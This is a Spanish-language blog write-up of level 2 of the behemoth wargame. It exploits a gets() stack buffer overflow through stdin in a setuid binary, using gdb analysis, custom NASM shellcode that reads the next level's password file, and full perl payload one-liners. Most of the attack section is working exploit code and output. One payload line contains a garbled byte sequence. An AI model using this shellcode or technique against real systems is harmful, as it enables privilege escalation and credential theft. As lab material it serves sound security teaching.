systemadmin.es > Programación > Wargame behemoth: nivel 2

Wargame behemoth: nivel 2

Seguimos con el nivel 2 del wargame behemoth. En este caso se trata de un buffer overflow como en el nivel 3 del wargame narnia, pero sin disponer del código fuente y usando stdin para el overflow en lugar de argv[1]

Primero de todo probamos el fichero:

level2@behemoth:~$ /wargame/level2 
Password: caca
Authentication failure.
Sorry.

Podemos apreciar las llamadas que hace con un objdump:

level2@behemoth:~$ objdump -d /wargame/level2 | grep "^[0-9]" | grep plt
080482b8 <seteuid@plt-0x10>:
080482c8 <seteuid@plt>:
080482d8 <gets@plt>:
080482e8 <__libc_start_main@plt>:
080482f8 <printf@plt>:
08048308 <__gmon_start__@plt>:

A continuación podemos analizar el código:

(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
0x080483d4 <main+0>:	push   ebp
0x080483d5 <main+1>:	mov    ebp,esp
0x080483d7 <main+3>:	sub    esp,0x68
0x080483da <main+6>:	and    esp,0xfffffff0
0x080483dd <main+9>:	mov    eax,0x0
0x080483e2 <main+14>:	add    eax,0xf
0x080483e5 <main+17>:	add    eax,0xf
0x080483e8 <main+20>:	shr    eax,0x4
0x080483eb <main+23>:	shl    eax,0x4
0x080483ee <main+26>:	sub    esp,eax
0x080483f0 <main+28>:	mov    DWORD PTR [esp],0x3eb
0x080483f7 <main+35>:	call   0x80482c8 <seteuid@plt>
0x080483fc <main+40>:	mov    DWORD PTR [esp],0x8048528
0x08048403 <main+47>:	call   0x80482f8 <printf@plt>
0x08048408 <main+52>:	lea    eax,[ebp-88]
0x0804840b <main+55>:	mov    DWORD PTR [esp],eax
0x0804840e <main+58>:	call   0x80482d8 <gets@plt>
0x08048413 <main+63>:	mov    DWORD PTR [esp],0x8048534
0x0804841a <main+70>:	call   0x80482f8 <printf@plt>
0x0804841f <main+75>:	leave  
0x08048420 <main+76>:	ret    
0x08048421 <main+77>:	nop    
0x08048422 <main+78>:	nop    
0x08048423 <main+79>:	nop    
0x08048424 <main+80>:	nop    
0x08048425 <main+81>:	nop    
0x08048426 <main+82>:	nop    
0x08048427 <main+83>:	nop    
0x08048428 <main+84>:	nop    
0x08048429 <main+85>:	nop    
0x0804842a <main+86>:	nop    
0x0804842b <main+87>:	nop    
0x0804842c <main+88>:	nop    
0x0804842d <main+89>:	nop    
0x0804842e <main+90>:	nop    
0x0804842f <main+91>:	nop    
End of assembler dump.
(gdb) 

Podemos hacer un buffer overflow en la variable que usa la función gets con el siguiente script:

level2@behemoth:~$ for i in $(seq 10 100); do perl -e "print \"a\"x$i; print \"\\n\";" | /wargame/level2 >/dev/null; if [ $? -ne 31 ]; then echo $i; break; fi; done
Illegal instruction
92

Vemos que nos da un segmentation fault con 92 carácteres, deberemos ir añadiendo hasta que tengamos el eip lleno de a. En este caso ocurre con 96 bytes:

level2@behemoth:/tmp/jordi$ perl -e 'print "a"x96;'
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalevel2@behemoth:/tmp/jordi$ /wargame/level2 
Password: 
level2@behemoth:/tmp/jordi$ 
level2@behemoth:/tmp/jordi$ 
level2@behemoth:/tmp/jordi$ gdb -q /wargame/level2 
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r
Starting program: /wargame/level2 
Password: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Authentication failure.
Sorry.

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) 

Para que se vea más claramente podemos usar 1234 como los últimos 4 bytes para sobrescribir el eip:

level2@behemoth:/tmp/jordi$ perl -e 'print "\x90"x92; print "1234";' | wc -c
96

Para trabajar más comodamente con stdin con gdb podemos usar una pipe (Debo dar las gracias a JM por la sugerencia)

level2@behemoth:/tmp/jordi$ mknod pipa p

Le indicamos a gdb que mande a stdin el contenido de pipa:

level2@behemoth:/tmp/jordi$ gdb -q /wargame/level2 
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r < pipa
Starting program: /wargame/level2 < pipa

Se nos queda evidentemente bloqueado, simplemente deberemos abrir otra shell y mandar a la pipe lo que queramos mandar al programa:

level2@behemoth:/tmp/jordi$ perl -e 'print "\x90"x92; print "1234";' > pipa

Podremos apreciar entonces como se ha sobrescrito el eip por 0x34333231 (4321):

Password: Authentication failure.
Sorry.

Program received signal SIGSEGV, Segmentation fault.
0x34333231 in ?? ()
(gdb) 

A continuación deberemos calcular la dirección a la que saltar, para ello podemos poner un break antes de hacer el call a gets para tener la posición de memoria en eax:

(gdb) break *0x0804840e
Breakpoint 1 at 0x804840e
(gdb) r
Starting program: /wargame/level2 

Breakpoint 1, 0x0804840e in main ()
(gdb) info registers
eax            0xbffff9f0	-1073743376
ecx            0x8048532	134513970
edx            0xb7fe1448	-1208085432
ebx            0xb7fdfff4	-1208090636
esp            0xbffff9d0	0xbffff9d0
ebp            0xbffffa48	0xbffffa48
esi            0x0	0
edi            0xb8000cc0	-1207956288
eip            0x804840e	0x804840e <main+58>
eflags         0x282	[ SF IF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

Vemos como tenemos en eax la dirección: 0xbffff9f0

Dirección donde colocaremos nuestro shellcode

Dirección donde colocaremos nuestro shellcode

Podemos probar la dirección con nops, quedando la dirección en la cadena \xf0\xf9\xff\xbf:

level2@behemoth:/tmp/jordi$ perl -e 'print "\x90"x92; print "\xf0\xf9\xff\xbf";' > pipa

Repetimos la operación con gdb:

(gdb) r < pipa
Starting program: /wargame/level2 < pipa
Password: Authentication failure.
Sorry.

Program received signal SIGILL, Illegal instruction.
0xbffffa4c in ?? ()
(gdb) 

Como apreciamos salta a la dirección y avanza de 0xbffff9f0 hasta llegar a 0x0xbffffa4c, los 92 bytes.

A continuación, podemos adaptar el mismo shellcode que hicimos para el wargame de narnia a este nivel:

global _start
section .text

_start:

			;; /home/level3/.passwd,0
			;;;;;;;;;;;;;;;;;
			; /hom
			; e/le
			; vel3
			; /.pa
			; sswd
			; 0000
			;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
			; 0000
			; sswd dwss 64777373
			; /.pa ap./ 61702E2F
			; vel3 3lev 336C6577
			; e/le el/e 656C2F65
			; /hom moh/ 6D6F682F


xor eax,eax
mov byte al,0x5		;syscall 5 = open

xor ebx,ebx
push ebx
push 0x64777373
push 0x61702E2F
push 0x336C6576
push 0x656C2F65
push 0x6D6F682F
mov ebx,esp		;nombre de fichero
mov esi,esp

xor ecx,ecx		;O_RDONLY
xor edx,edx

int 0x80

push eax		;descriptor

xor eax,eax		;syscall 3 = read
mov byte al,0x3

pop ebx			;descriptor

xor edi,edi
push edi		;4bytes
push edi		;4bytes
push edi		;4bytes
push edi		;4bytes
			;TOTAL: 16bytes de buffer

mov ecx,esp		;buff

xor edx,edx
mov byte dl,0xF		;tamanyo

int 0x80

push eax		; bytes read

xor eax,eax
mov byte al,0x4		;syscall 4 = write

xor ebx,ebx
mov byte bl,0x1		;stdout

pop edx			;total leido

mov ecx,esp		;buf

int 0x80

xor eax,eax
inc eax			;syscall 1 = exit
xor ebx,ebx		;return 0

int 0x80

Podemos ensamblarlo con los siguientes comandos:

level2@behemoth:/tmp/jordi$ nasm -f elf dos.asm 
level2@behemoth:/tmp/jordi$ ld -s -o dos dos.o 

Comprobamos que no tenemos ningún 00 (que sería fin de cadena y por lo tanto dejaría de copiar allí)

level2@behemoth:/tmp/jordi$ objdump -d -M intel dos | grep 00

A continuación con objdump podemos transformar el binario en un script en perl:

level2@behemoth:/tmp/jordi$ echo perl -e \'$(objdump -d dos | grep "^ [0-9acbdef]" | cut -f -2 | cut -f 2- | sed 's/  */ /g' | sed 's/ $//g' | sed 's/^/\\x/g' | sed 's/ /\\x/g' | sed 's/^/print "/' | sed 's/$/";/')\'
perl -e 'print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x03"; print "\x5b"; print "\x31\xff"; print "\x57"; print "\x57"; print "\x57"; print "\x57"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x5a"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80";'

Comprobamos su tamaño:

level2@behemoth:/tmp/jordi$ perl -e 'print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x03"; print "\x5b"; print "\x31\xff"; print "\x57"; print "\x57"; print "\x57"; print "\x57"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x5a"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80";' | wc -c
83

Agregamos nops hasta llegar al tamaño requerido, dejando espacio para la dirección a la que saltar:

level2@behemoth:/tmp/jordi$ perl -e 'print "\x90"x9; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x03"; print "\x5b"; print "\x31\xff"; print "\x57"; print "\x57"; print "\x57"; print "\x57"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x5a"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80";' | wc -c
92

Añadimos la dirección de salto y ya lo tenemos todo:

level2@behemoth:/tmp/jordi$ perl -e 'print "\x90"x9; print "\x31\xc0"; print 
"\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x03"; print "\x5b"; print "\x31\xff"; print "\x57"; print "\x57"; print "\x57"; print "\x57"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x5a"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80"; print "\xf0\xf9\xff\xbf";' | wc -c
96

Pero veremos que no nos funciona dando un error:

level2@behemoth:~$ perl -e 'print "\x90"x9; print "\x31\xc0"; print 
"\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x03"; print "\x5b"; print "\x31\xff"; print "\x57"; print "\x57"; print "\x57"; print "\x57"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x50"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x5a"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80"; print "\xf0\xf9\xff\xbf";' | /wargame/level2 
Password: Authentication failure.
Sorry.
Illegal instruction

Podemos examinar la memoria con gdb y veremos como el shellcode ha sido sobreescrito, ya que no son las mismas instrucciones que hemos programado nosotros:

(gdb) x/50 0xbffff9f0
0xbffff9f0:	nop    
0xbffff9f1:	nop    
0xbffff9f2:	nop    
0xbffff9f3:	nop    
0xbffff9f4:	nop    
0xbffff9f5:	nop    
0xbffff9f6:	nop    
0xbffff9f7:	nop    
0xbffff9f8:	nop    
0xbffff9f9:	nop    
0xbffff9fa:	nop    
0xbffff9fb:	nop    
0xbffff9fc:	nop    
0xbffff9fd:	nop    
0xbffff9fe:	nop    
0xbffff9ff:	xor    %eax,%eax
0xbffffa01:	mov    $0x5,%al
0xbffffa03:	xor    %ebx,%ebx
0xbffffa05:	push   %ebx
0xbffffa06:	push   $0x64777373
0xbffffa0b:	push   $0x61702e2f
0xbffffa10:	push   $0x336c6576
0xbffffa15:	push   $0x656c2f65
0xbffffa1a:	push   $0x6d6f682f
0xbffffa1f:	mov    %esp,%ebx
0xbffffa21:	mov    %esp,%esi
0xbffffa23:	xor    %ecx,%ecx
0xbffffa25:	xor    %edx,%edx
0xbffffa27:	int    $0x80
0xbffffa29:	mov    %eax,%ebx
0xbffffa2b:	xor    %eax,%eax
0xbffffa2d:	mov    $0x3,%al
0xbffffa2f:	mov    %esp,%ecx
0xbffffa31:	xor    %edx,%edx
0xbffffa33:	mov    $0x6f,%dl
0xbffffa35:	insl   (%dx),%es:(%edi)
0xbffffa36:	gs
0xbffffa37:	das    
0xbffffa38:	das    
0xbffffa39:	push   $0x2f656d6f
0xbffffa3e:	insb   (%dx),%es:(%edi)
0xbffffa3f:	gs
0xbffffa40:	jbe    0xbffffaa7
0xbffffa42:	insb   (%dx),%es:(%edi)
0xbffffa43:	xor    (%edi),%ebp
0xbffffa45:	jo,pn  0xbffffaa9
0xbffffa48:	jae    0xbffffabd
0xbffffa4a:	ja     0xbffffab0
0xbffffa4c:	add    %al,(%eax)
0xbffffa4e:	add    %al,(%eax)

Examinando la memoria del shellcode como datos podemos ver como desde la dirección 0xbffffa3c a la 0xbffffa4f tenemos los datos que hemos introducido en la pila con el nombre de fichero a abrir:

(gdb) x/50 0xbffff9f0
0xbffff9f0:	0x90909090	0x90909090	0x90909090	0x31909090
0xbffffa00:	0x3105b0c0	0x736853db	0x68647773	0x61702e2f
0xbffffa10:	0x6c657668	0x2f656833	0x2f68656c	0x896d6f68
0xbffffa20:	0x31e689e3	0xcdd231c9	0x31c38980	0x8903b0c0
0xbffffa30:	0xb2d231e1	0x2f656d6f	0x6d6f682f	0x656c2f65
0xbffffa40:	0x336c6576	0x61702e2f	0x64777373	0x00000000
0xbffffa50:	0x00000000	0xbffffac4	0xbffffacc	0x00000000
0xbffffa60:	0xb7fdfff4	0x00000000	0xb8000cc0	0xbffffa98
0xbffffa70:	0xbffffa50	0xb7ec7e6d	0x00000000	0x00000000
0xbffffa80:	0x00000000	0xb7ff6090	0xb7ec7ded	0xb8000ff4
0xbffffa90:	0x00000001	0x08048320	0x00000000	0x08048341
0xbffffaa0:	0x080483d4	0x00000001	0xbffffac4	0x08048480
0xbffffab0:	0x08048430	0xb7ff6c40

Deberemos entonces cambiar de sitio la pila. Podemos, por ejemplo colocarla en la dirección de salto ya que el código se lee hacia abajo mientras que la pila crece hacia arriba (yo lo pienso siempre así, hay gente que lo diría al contrario). Simplemente modificamos ebp y esp con la dirección:

global _start
section .text

_start:

			;; /home/level3/.passwd,0
			;;;;;;;;;;;;;;;;;
			; /hom
			; e/le
			; vel3
			; /.pa
			; sswd
			; 0000
			;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
			; 0000
			; sswd dwss 64777373
			; /.pa ap./ 61702E2F
			; vel3 3lev 336C6577
			; e/le el/e 656C2F65
			; /hom moh/ 6D6F682F

mov ebp, 0xbffff9f0
mov esp,ebp

xor eax,eax
mov byte al,0x05	;syscall 5 = open

xor ebx,ebx
push ebx
push 0x64777373
push 0x61702E2F
push 0x336C6576
push 0x656C2F65
push 0x6D6F682F
mov ebx,esp		;nombre de fichero
mov esi,esp

xor ecx,ecx		;O_RDONLY
xor edx,edx

int 0x80

mov ebx, eax		;descriptor

xor eax,eax		;syscall 3 = read
mov byte al,0x03

mov ecx,esp		;buff: cadena fichero

xor edx,edx
mov byte dl,0x0F	;tamanyo

int 0x80

mov edx, eax		; bytes read

xor eax,eax
mov byte al,0x4		;syscall 4 = write

xor ebx,ebx
mov byte bl,0x1		;stdout

mov ecx,esp		;buf

int 0x80

xor eax,eax
inc eax			;syscall 1 = exit
xor ebx,ebx		;return 0

int 0x80

Volvemos a compilar:

level2@behemoth:/tmp/jordi$ nasm -f elf dos.asm
level2@behemoth:/tmp/jordi$ ld -s -o dos dos.o

Generamos el script en perl con objdump:

level2@behemoth:/tmp/jordi$ echo perl -e \'$(objdump -d dos | grep "^ [0-9acbdef]" | cut -f -2 | cut -f 2- | sed 's/  */ /g' | sed 's/ $//g' | sed 's/^/\\x/g' | sed 's/ /\\x/g' | sed 's/^/print "/' | sed 's/$/";/')\'
perl -e 'print "\xbd\xf0\xf9\xff\xbf"; print "\x89\xec"; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x89\xc3"; print "\x31\xc0"; print "\xb0\x03"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x89\xc2"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80";'

A continuación volvemos a rellenar con nops y con la dirección de salto hasta llegar a los 96 bytes:

level2@behemoth:/tmp/jordi$ perl -e 'print "\xbd\xf0\xf9\xff\xbf"; print "\x89\xec"; print "\x31\xc0"; print "\xb0\x05"; print "\x31\x\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x89\xc3"; print "\x31\xc0"; print "\xb0\x03"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x89\xc2"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80";' | wc -c
84
level2@behemoth:/tmp/jordi$ perl -e ' print "\x90"x10; print "\xbd\xf0\xf9\xff\xbf"; print "\x89\xec"; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x89\xc3"; print "\x31\xc0"; print "\xb0\x03"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x89\xc2"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80";' | wc -c
94
level2@behemoth:/tmp/jordi$ perl -e ' print "\x90"x10; print "\xbd\xf0\xf9\xff\xbf"; print "\x89\xec"; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x89\xc3"; print "\x31\xc0"; print "\xb0\x03"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x89\xc2"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80"; print "1234";' | wc -c
98
level2@behemoth:/tmp/jordi$ perl -e ' print "\x90"x8; print "\xbd\xf0\xf9\xff\xbf"; print "\x89\xec"; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x89\xc3"; print "\x31\xc0"; print "\xb0\x03"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x89\xc2"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80"; print "1234";' | wc -c
96
level2@behemoth:/tmp/jordi$ perl -e ' print "\x90"x8; print "\xbd\xf0\xf9\xff\xbf"; print "\x89\xec"; print "\x31\xc0"; print "\xb0\x05"; print "\x31\xdb"; print "\x53"; print "\x68\x73\x73\x77\x64"; print "\x68\x2f\x2e\x70\x61"; print "\x68\x76\x65\x6c\x33"; print "\x68\x65\x2f\x6c\x65"; print "\x68\x2f\x68\x6f\x6d"; print "\x89\xe3"; print "\x89\xe6"; print "\x31\xc9"; print "\x31\xd2"; print "\xcd\x80"; print "\x89\xc3"; print "\x31\xc0"; print "\xb0\x03"; print "\x89\xe1"; print "\x31\xd2"; print "\xb2\x0f"; print "\xcd\x80"; print "\x89\xc2"; print "\x31\xc0"; print "\xb0\x04"; print "\x31\xdb"; print "\xb3\x01"; print "\x89\xe1"; print "\xcd\x80"; print "\x31\xc0"; print "\x40"; print "\x31\xdb"; print "\xcd\x80"; print "\xf0\xf9\xff\xbf";' | wc -c
96

Y ejecutamos el nivel, da lo mismo usar la named pipe que hemos creado o la pipe tradicional con un cat:

level2@behemoth:/tmp/jordi$ /wargame/level2 < pipa
Password: Authentication failure.
Sorry.
Nu4OhT>i

Con lo cual ya tenemos la contraseña para traspasar al siguiente nivel:

Traspasando hacia el siguiente nivel

Traspasando hacia el siguiente nivel

El listado de soluciones de otros niveles del wargame de behemoth es el siguiente:

Deja un comentario:

XHTML - Tags permitidos:<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>